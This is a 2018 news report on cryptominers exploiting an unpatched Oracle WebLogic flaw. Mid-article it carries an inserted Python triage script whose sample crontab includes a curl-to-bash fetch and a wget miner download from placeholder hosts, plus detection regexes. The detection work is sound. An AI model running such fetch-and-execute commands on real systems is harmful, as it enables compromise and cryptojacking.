Oracle WebLogic hole primed to pump Monero

Careless cloud customers neglect patch, allowing crypto miners to move in

By Thomas Claburn in San Francisco

Posted in Data Centre, 9th January 2018 20:59 GMT

An Oracle WebLogic vulnerability fixed in October last year is being exploited on unpatched machines to mine Monero, a cryptocurrency, and other lesser-known imaginary coins.

Writing for the SANS Technology Institute, Renato Marinho, chief research officer at Morphus Labs, on Monday said a recently disclosed software bug – specifically, poor input sanitization in wls-wsat, a WebLogic component – can be exploited to allow an unauthenticated attacker to run arbitrary commands with the privileges of the server's user account.

The vulnerability also affects Oracle's PeopleSoft software, which can include WebLogic as a server.

In a follow-up post on Tuesday, Johannes B. Ullrich, SANS Dean of Research, explained that a proof-of-concept exploit was published by Lian Zhang, a Chinese security researcher, on his blog in December. By the end of that month, he said, a working exploit designed to install cryptomining code began showing up.

The exploit downloads a bash script that chooses a suitable working directory, kills any crypto mining already active on the system, and creates a cron job to download new mining code, identified as either XMRig or fs-manager.

Eye off the ball

The attack appears to be difficult to miss because it also kills the WebLogic service on the target machine. But at cloud providers, evidently, customers aren't paying very close attention.
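As an added defensive illustration (not code from the article, SANS or Morphus Labs), the following Python triage script checks a constructed crontab and a constructed process list for the behaviour described above: a cron entry that fetches and runs remote code, a running XMRig or fs-manager process, and a missing WebLogic server process. The URL placeholders, pool address and process names are assumptions, not indicators from the article.

```python
import re

# Constructed crontab sample; the URLs are placeholders, not real indicators.
SAMPLE_CRONTAB = """\
0 2 * * * /usr/bin/backup-db.sh
*/10 * * * * curl -fsSL http://EXAMPLE-PLACEHOLDER/m.sh | bash
*/5 * * * * wget -q http://EXAMPLE-PLACEHOLDER/fs-manager -O /tmp/fs-manager
30 4 * * * /opt/scripts/rotate-logs.sh
"""

# Constructed (name, command line) pairs; a healthy host would show WebLogic.
SAMPLE_PROCESSES = [
    ("java", "/usr/bin/java -Dweblogic.Name=AdminServer weblogic.Server"),
    ("xmrig", "/tmp/xmrig -o pool.example:3333 --donate-level=1"),
]

DOWNLOADER = re.compile(r"\b(curl|wget)\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(ba)?sh\b")
MINER_NAMES = re.compile(r"\b(xmrig|fs-manager)\b", re.IGNORECASE)


def suspicious_cron_entries(crontab_text):
    """Return cron lines whose command downloads content and either pipes it
    to a shell or references a known miner binary name."""
    hits = []
    for line in crontab_text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        fields = stripped.split(None, 5)  # five schedule fields + command
        if len(fields) < 6:
            continue
        command = fields[5]
        if DOWNLOADER.search(command) and (
            PIPE_TO_SHELL.search(command) or MINER_NAMES.search(command)
        ):
            hits.append(stripped)
    return hits


def miner_processes(processes):
    """Return command lines whose name or arguments match a miner name."""
    return [cmd for name, cmd in processes
            if MINER_NAMES.search(name) or MINER_NAMES.search(cmd)]


def weblogic_running(processes):
    """True if a WebLogic server JVM is present in the process list."""
    return any("weblogic.Server" in cmd for _, cmd in processes)


def triage(crontab_text, processes):
    """Summarise the three checks; any flag set is worth an analyst's look."""
    return {
        "cron_hits": suspicious_cron_entries(crontab_text),
        "miners": miner_processes(processes),
        "weblogic_missing": not weblogic_running(processes),
    }
```

Run `triage(SAMPLE_CRONTAB, SAMPLE_PROCESSES)` to see both constructed cron entries and the miner process flagged; dropping the WebLogic line from the sample list also sets `weblogic_missing`.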

Ullrich says a log from a compromised system covering the five-day period from January 4th through January 9th this year shows 722 affected IP addresses at various locations around the world.

Many of the affected hosts are at cloud service providers: ~144 at Amazon Web Services, ~41 at Digital Ocean, ~33 at Google Cloud, ~30 at Microsoft Azure, ~30 at Oracle Cloud, and ~17 at OVH.

"This isn’t a surprise since many organizations are moving their most critical data to the cloud to make it easier for the bad guys to get to it," quipped Ullrich.

Ullrich said XMRig is legitimate crypto-mining code, and recounted Marinho's recovery of a configuration file showing one miner managed to collect 611 Monero coins, worth about $226,070 in theory.

However, that purse appears to have been collected over a long period of time, perhaps through other avenues, because the user's 450 KH/s hash rate could only generate about $31,000 in fantasy coins a month.

Marinho also found files for another group's attempt to use the same vulnerability to mine AEON, a lesser known cryptocurrency.

Rather wryly, Ullrich observed, "Even though they are achieving a similar hash rate, they only earned about $6,000 so far. Maybe they will switch to Monero after reading this." ®
